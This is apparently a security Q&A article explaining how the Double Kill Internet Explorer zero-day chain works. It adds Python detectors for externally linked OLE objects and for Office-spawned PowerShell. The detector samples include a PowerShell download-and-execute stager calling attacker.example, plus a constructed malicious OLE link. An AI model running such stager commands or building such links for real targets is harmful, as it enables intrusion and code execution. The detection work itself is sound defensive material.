Microsoft patched a zero-day vulnerability known as Double Kill that affects Internet Explorer and other applications... using Office documents. How does the Double Kill exploit work and why is it so difficult to detect?
Advanced persistent threat (APT) attacks usually display a level of technical sophistication that isn't observed in more common criminal attacks; however, they follow a very similar framework. Many attacks use phishing to get the target to open a malicious file. That file downloads a small stager, which in turn fetches a Trojan that takes over the system and communicates with a command-and-control (C&C) server.
While more common attacks don't typically use zero-days, APT groups do use zero-day exploits, when necessary, because the groups have the resources and skills to find or purchase them.
One multistage APT attack that exploited an Internet Explorer zero-day, CVE-2018-8174 in the Windows VBScript engine, was identified by the Qihoo 360 Core Security team and named Double Kill. The researchers did not establish how the malicious Microsoft Office file reached the target, but it is thought to have been delivered through standard phishing.
The Qihoo 360 Core Security team published additional details about Double Kill after Microsoft released a patch for the vulnerability. The malicious Office document contains an Object Linking and Embedding (OLE) auto-link object. When Office updates that link, it retrieves a remote web page and renders it with the Internet Explorer engine, which also loads IE's VBScript engine; this happens regardless of which browser the user has set as the default. The page's VBScript then triggers the memory-corruption bug in the VBScript engine, and the resulting code execution eventually runs a PowerShell command on the host.
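One way to screen incoming documents for the delivery vector described above is to unzip the document, read every relationships part and flag OLE relationships whose target lies outside the package. The following is an added example, not code from the article or from Qihoo 360, written against the Office Open XML package layout (.docx/.xlsx/.pptx), so it does not cover the legacy binary or RTF formats. The sample documents, the rId5 identifier and the attacker.example URL are constructed for the example.

```python
"""Scan an Office Open XML document for externally linked OLE objects,
the delivery mechanism described for Double Kill.

Added example, not code from the original article or from Qihoo 360.
The sample documents are constructed in memory, so it runs offline.
"""
import io
import re
import zipfile
from typing import Dict, List

# Relationship type Office uses for OLE objects; TargetMode="External"
# means the object is fetched from the Target rather than the package.
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

_REL_TAG = re.compile(r"<Relationship\b[^>]*>")
_OLE_TAG = re.compile(r"<o:OLEObject\b[^>]*>")
_ATTR = re.compile(r'([\w:]+)="([^"]*)"')


def _attrs(tag: str) -> Dict[str, str]:
    """Attribute name/value pairs of one XML start tag."""
    return dict(_ATTR.findall(tag))


def find_external_ole_links(docx_bytes: bytes) -> List[Dict[str, object]]:
    """Return one finding per OLE relationship that points outside the
    package.  'auto_update' is True when the document's OLEObject element
    for that link carries UpdateMode="Always", i.e. Office refreshes the
    link (and fetches the remote content) without the user asking."""
    findings: List[Dict[str, object]] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        auto_ids = set()
        for name in pkg.namelist():
            if not name.endswith(".xml"):
                continue
            text = pkg.read(name).decode("utf-8", "replace")
            for tag in _OLE_TAG.findall(text):
                a = _attrs(tag)
                if a.get("Type") == "Link" and a.get("UpdateMode") == "Always":
                    auto_ids.add(a.get("r:id", ""))
        for name in pkg.namelist():
            if not name.endswith(".rels"):
                continue
            text = pkg.read(name).decode("utf-8", "replace")
            for tag in _REL_TAG.findall(text):
                a = _attrs(tag)
                if a.get("Type") != OLE_REL_TYPE:
                    continue
                if a.get("TargetMode", "Internal") != "External":
                    continue
                findings.append({
                    "part": name,
                    "id": a.get("Id", ""),
                    "target": a.get("Target", ""),
                    "auto_update": a.get("Id", "") in auto_ids,
                })
    return findings


def build_sample_docx(target: str, external: bool) -> bytes:
    """Constructed minimal .docx: one OLE object whose relationship points
    at `target`.  external=True models a Double Kill style link to a
    remote page; external=False models an ordinary embedded object."""
    mode = ' TargetMode="External"' if external else ""
    ole_type = "Link" if external else "Embed"
    update = ' UpdateMode="Always"' if external else ""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/'
        'wordprocessingml/2006/main" xmlns:o="urn:schemas-microsoft-com:'
        'office:office" xmlns:r="http://schemas.openxmlformats.org/'
        'officeDocument/2006/relationships"><w:body><w:p><w:r><w:object>'
        f'<o:OLEObject Type="{ole_type}" ProgID="Word.Document.8" '
        f'r:id="rId5"{update}/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/'
        '2006/relationships">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{target}"{mode}/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("word/document.xml", document_xml)
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    # Hypothetical URL, constructed for the sample; not from the incident.
    bad = build_sample_docx("http://attacker.example/stage2.html", external=True)
    good = build_sample_docx("embeddings/oleObject1.bin", external=False)
    print(find_external_ole_links(bad))   # one finding, auto_update True
    print(find_external_ole_links(good))  # []
```

Because every .rels part is scanned, the same check applies to spreadsheets and presentations, not only Word documents. An external OLE link is not malicious by itself, but one that auto-updates and points at an http URL is rare in legitimate business documents and is worth quarantining for review.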
The attack then leans heavily on obfuscation: the payload that installs the Trojan is encrypted, which makes it harder both to analyze and to detect. The decrypted code is loaded reflectively into memory, so the stage that runs the exploit's payload never needs its own executable file on disk. The address of the C&C server is not written into the code either; it is hidden in an image using steganography and recovered at runtime.
It should also be noted that, later in the attack, multiple files are downloaded or created and executed on the local system, so the intrusion is not entirely fileless and does leave artifacts that endpoint tools can examine.
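The process lineage these stages leave behind is one of the more reliable detection points, because an Office application has little legitimate reason to launch a shell. The following is an added example, not code from the article or from Qihoo 360: it scores process-creation events in the shape of parent image, image and command line, flags shells spawned by Office, checks for download-and-execute traits, and decodes a -EncodedCommand argument so the indicators are matched on the plaintext as well. The event records, their field names and the attacker.example URL are constructed for the example.

```python
"""Flag a shell launched from an Office process and unpack its command
line, the step that follows the VBScript exploit in the chain above.

Added example, not code from the original article or from Qihoo 360.
The events below are constructed in the shape of process-creation logs
(parent image, image, command line); none comes from a real incident.
"""
import base64
import re
from typing import Dict, List, Optional

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                  "wscript.exe", "cscript.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, so
# match "-e" plus letters, then at least 20 base64 characters.
_ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE)

# Command-line traits typical of download-and-execute stagers.
INDICATORS = [
    ("remote download", re.compile(r"downloadstring|downloadfile|"
                                   r"invoke-webrequest|\biwr\b", re.I)),
    ("in-memory execution", re.compile(r"invoke-expression|\biex\b", re.I)),
    ("embedded base64", re.compile(r"frombase64string", re.I)),
    ("hidden window", re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("profile disabled", re.compile(r"-nop(rofile)?\b", re.I)),
    ("encoded command", _ENCODED),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext of a -EncodedCommand argument (base64 of
    UTF-16LE) or None if the line carries none or it fails to decode."""
    m = _ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument; used only to construct samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def assess(event: Dict[str, str]) -> Dict[str, object]:
    """Score one process-creation event.  Lineage (Office -> shell) and
    command-line indicators are checked on both the raw line and the
    decoded -EncodedCommand payload, so encoding does not hide them."""
    parent = _basename(event.get("ParentImage", ""))
    image = _basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    decoded = decode_encoded_command(cmdline)
    surface = cmdline if decoded is None else cmdline + "\n" + decoded
    reasons: List[str] = []
    if parent in OFFICE_PARENTS and image in SHELL_CHILDREN:
        reasons.append(f"{parent} spawned {image}")
    for label, rx in INDICATORS:
        if rx.search(surface):
            reasons.append(label)
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


# Constructed sample events; the URL is a placeholder, not an indicator.
STAGER = ("IEX (New-Object Net.WebClient).DownloadString("
          "'http://attacker.example/stage2.ps1')")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGER)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(assess(ev))
```

The lineage rule alone catches the first event even if the attacker drops every command-line indicator, which is why it should be alerted on independently of the pattern matches; the decoded payload is kept in the result so an analyst sees the real command rather than a base64 blob.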
Related Q&A from Nick Lewis
Cisco Talos' Thanatos ransomware decryptor can recover files affected by new ransomware that won't decrypt ransomed files even when a ransom has been...
A phishing campaign targeting Trezor wallets may have poisoned DNS or hijacked BGP to gain access. Learn how the attack worked and how to mitigate it...
Okta researchers found a bypass that allows macOS malware to pose as signed Apple files. Discover how this is possible and how to mitigate this ...